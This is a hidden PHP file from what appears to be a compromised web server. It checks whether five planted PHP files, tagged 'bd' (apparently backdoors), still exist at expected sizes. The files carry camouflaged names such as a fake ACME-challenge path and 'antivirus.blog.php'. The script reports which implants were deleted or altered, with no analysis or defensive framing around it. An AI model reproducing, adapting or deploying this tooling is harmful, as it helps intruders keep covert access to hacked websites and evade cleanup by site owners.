File: //var/tmp/.pointer
<?php $r = '/home/parallelmvmt/trainyouremail.com'; $x = ["/.well-known/acme-challenge/com_docman.php"=>"bd@@4775761@@727",
"/farhad/ob_iconv_handle.php"=>"bd@@4771534@@549",
"/daphne/team/sounds.js.php"=>"bd@@4776076@@593",
"/daphne/agenda/antivirus.blog.php"=>"bd@@5981897@@1009",
"/daphne/coaching/masterEN.headers.php"=>"bd@@5982191@@942"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');